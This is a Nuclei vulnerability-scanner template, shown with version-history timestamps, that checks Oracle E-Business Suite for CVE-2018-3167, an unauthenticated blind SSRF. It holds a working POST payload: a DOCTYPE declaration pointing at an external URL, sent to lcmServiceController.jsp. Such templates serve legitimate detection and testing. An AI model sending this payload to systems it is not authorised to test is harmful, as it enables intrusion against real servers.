nuclei-templates/cves/2018/CVE-2018-3167.yaml

26 lines
584 B
YAML
Raw Normal View History

2021-02-03 17:54:35 +00:00
id: CVE-2018-3167
info:
name: Unauthenticated Blind SSRF in Oracle EBS
author: geeknik
2021-02-03 17:56:14 +00:00
severity: low
2021-02-03 17:54:35 +00:00
description: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145
tags: cve,cve2018,oracle,ebs,ssrf
2021-02-03 17:54:35 +00:00
requests:
- method: POST
path:
- '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'
2021-06-11 07:49:46 +00:00
body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://{{Hostname}}">
2021-02-03 17:54:35 +00:00
matchers-condition: and
matchers:
- type: word
words:
- 'Unexpected text in DTD'
part: body
- type: status
status:
2021-06-11 07:44:15 +00:00
- 200